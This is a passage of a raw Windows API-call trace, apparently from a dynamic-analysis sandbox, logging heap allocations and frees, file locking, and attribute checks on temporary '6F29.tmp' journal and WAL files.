RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0xb [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a7e0 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7e0) returned 0xa [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14) returned 0x394ba10 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba10) returned 0x14 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xf) returned 0x392a810 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xf [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x11) returned 0x394b9f0 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9f0) returned 0x11 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x394b9d0 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b9d0) returned 0x18 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cd0) returned 0x80 [0163.084] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x3929cd0, Size=0x100) returned 0x3929dd8 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd8) returned 0x100 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x14) returned 0x394ba70 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba70) returned 0x14 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a50 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x392a650 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929ee0 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ee0) returned 0x30 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.085] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.085] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394ba90 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba90) returned 0x13 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a50 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x392a650 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929cd0 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cd0) returned 0x30 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.085] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.085] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x11) returned 0x394bab0 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394bab0) returned 0x11 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a50 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x392a650 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.085] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929d08 [0163.085] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d08) returned 0x30 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.086] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.086] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x394bad0 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394bad0) returned 0x15 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x33) returned 0x392af80 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x33 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3) returned 0x392a650 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x3 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a50 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x30 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x3 [0163.086] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x33 [0163.086] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x17) returned 0x394baf0 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394baf0) returned 0x17 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3949438 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x30 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x392a650 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.086] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3949470 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949470) returned 0x30 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x2 [0163.086] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.086] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x30 [0163.087] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a828 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x10 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x39494a8 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39494a8) returned 0xe0 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949590 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949590) returned 0x3fc [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949590) returned 0x3fc [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949590) returned 0x3fc [0163.087] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949590 | out: hHeap=0x2dc0000) returned 1 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39494a8) returned 0xe0 [0163.087] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39494a8 | out: hHeap=0x2dc0000) returned 1 [0163.087] _aulldvrm () returned 0x0 [0163.087] _aulldvrm () returned 0x0 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x39) returned 0x394a860 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x39 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0b0 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x58) returned 0x39494a8 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39494a8) returned 0x58 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x8) returned 0x392a650 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x8 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x7) returned 0x3929f18 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f18) returned 0x7 [0163.087] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5f) returned 0x3949508 [0163.087] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949508) returned 0x5f [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a8e8 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8e8) returned 0x10 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x39 [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a650) returned 0x8 [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a650 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39494a8) returned 0x58 [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39494a8 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f18) returned 0x7 [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f18 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3949570 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0xe0 [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949658 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949658 | out: hHeap=0x2dc0000) returned 1 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0xe0 [0163.088] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949570 | out: hHeap=0x2dc0000) returned 1 [0163.088] _aulldvrm () returned 0x0 [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3b) returned 0x394a860 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3b [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0b0 [0163.088] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.088] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3b) returned 0x394a8a8 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a8a8) returned 0x3b [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3949438 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x30 [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x39494a8 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39494a8) returned 0x30 [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x58) returned 0x3949570 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0x58 [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x8) returned 0x3929f18 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f18) returned 0x8 [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a8d0 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8d0) returned 0xd [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x65) returned 0x395b8c8 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x65 [0163.089] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a8a0 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8a0) returned 0x10 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3b [0163.089] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.089] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f18) returned 0x8 [0163.089] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f18 | out: hHeap=0x2dc0000) returned 1 [0163.089] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0x58 [0163.089] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949570 | out: hHeap=0x2dc0000) returned 1 [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8d0) returned 0xd [0163.090] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8d0 | out: hHeap=0x2dc0000) returned 1 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3949570 [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0xe0 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949658 [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949658) returned 0x3fc [0163.090] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949658 | out: hHeap=0x2dc0000) returned 1 [0163.090] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949570) returned 0xe0 [0163.090] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949570 | out: hHeap=0x2dc0000) returned 1 [0163.090] UnlockFileEx (in: hFile=0x154, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de480 | out: lpOverlapped=0x2de480) returned 1 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x394bb10 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3949570 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a8d0 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x39495c8 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a900 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a948 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a930 [0163.090] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a990 [0163.091] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392aa20 [0163.091] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3949650 [0163.091] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949738 [0163.091] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949738 | out: hHeap=0x2dc0000) returned 1 [0163.091] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949650 | out: hHeap=0x2dc0000) returned 1 [0163.091] LockFileEx (in: hFile=0x154, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def88 | out: lpOverlapped=0x2def88) returned 1 [0163.091] LockFileEx (in: hFile=0x154, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2def7c | out: lpOverlapped=0x2def7c) returned 1 [0163.091] UnlockFileEx (in: hFile=0x154, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2def8c | out: lpOverlapped=0x2def8c) returned 1 [0163.091] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.091] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3949650 [0163.091] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x3949650, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-journal") returned 54 [0163.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2def8c | out: lpFileInformation=0x2def8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.092] GetLastError () returned 0x2 [0163.092] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949650 | out: hHeap=0x2dc0000) returned 1 [0163.092] ReadFile (in: hFile=0x154, lpBuffer=0x2df008, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2defdc, lpOverlapped=0x2defbc | out: lpBuffer=0x2df008*, lpNumberOfBytesRead=0x2defdc*=0x10, lpOverlapped=0x2defbc) returned 1 [0163.092] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.092] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b938 [0163.092] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b938, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-wal") returned 50 [0163.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2def9c | out: lpFileInformation=0x2def9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.092] GetLastError () returned 0x2 [0163.092] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b938 | out: hHeap=0x2dc0000) returned 1 [0163.092] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x2defc8 | out: lpFileSizeHigh=0x2defc8*=0x0) returned 0x1c00 [0163.092] UnlockFileEx (in: hFile=0x154, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2defb8 | out: lpOverlapped=0x2defb8) returned 1 [0163.092] CloseHandle (hObject=0x154) returned 1 [0163.092] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.092] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395c8b0 | out: hHeap=0x2dc0000) returned 1 [0163.092] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394d1c0 | out: hHeap=0x2dc0000) returned 1 [0163.093] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a660 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8a0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8e8 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9c0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a978 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a8a8 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39494a8 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949508 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d58 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba30 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9d8 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9f0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7b0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7e0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba10 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a810 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9f0 | out: hHeap=0x2dc0000) returned 1 [0163.094] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b9d0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba70 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ee0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba90 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929cd0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394bab0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d08 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394bad0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) 